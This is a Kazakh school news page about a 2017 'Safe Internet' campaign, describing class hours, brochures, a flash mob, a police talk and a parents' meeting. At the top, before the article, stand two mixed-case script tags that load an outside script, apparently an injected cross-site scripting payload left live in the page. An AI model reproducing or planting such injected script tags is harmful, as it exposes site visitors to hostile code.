<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.04.2017

«Қауіпсіз ғаламтор»

            Сандықтау орта мектебінің оқушылары арасында «Қауіпсіз ғаламтор» атты республикалық

ақпараттық кампания негізінде келесі іс-шаралар 

өткізілді:

-      «Ғаламтор менің өмірімде» атты сынып сағаттарында

оқушылар арасында қазіргі заманда ғаламтордың дамып, кез келген адамның

көмекшісіне айналғаны туралы айтылды. Ғаламтордың адам үшін пайдалы және

жағымсыз қасиеттері туралы ой бөлісті.

-      6-сынып оқушыларымен «Қауіпсіз ғаламтор» акциясы

барысында қауіпсіз ғаламтор ұғымының мағынасын ашып, таратуға арналған

брошюралар дайындады. Балалар мұғалім таратқан дайын үлгілермен танысып шықты.

Интерактивті тақтадан аталған тақырып бойынша бейнебаян тамашалады.

-      6-8 сынып оқушылары арасынан еріктілер тобы үзіліс

кезінде «Біз қауіпсіз ғаламтор үшін» атты флеш-моб өткізді.

-      Учаскелік инспектор А.С.Рахимовтың шақырылуымен жоғарғы

сынып оқушылары арасында жағымсыз желілерге кірмеу, ғаламтордағы әдеп туралы

әңгіме жүргізілді.

-      Ата-аналар жиналысында ғаламтордың балаларға кері әсері,

компьютерде көп уақыт өткізудің салдары туралы, жағымсыз желілерге кіруге тыйым

салу, «Ата-аналар бақылауы» қызметі туралы айтылды, брошюралар таратылды.

Просмотров: 1057


Пікір қосу



Деректерді қолтаңбаға қосу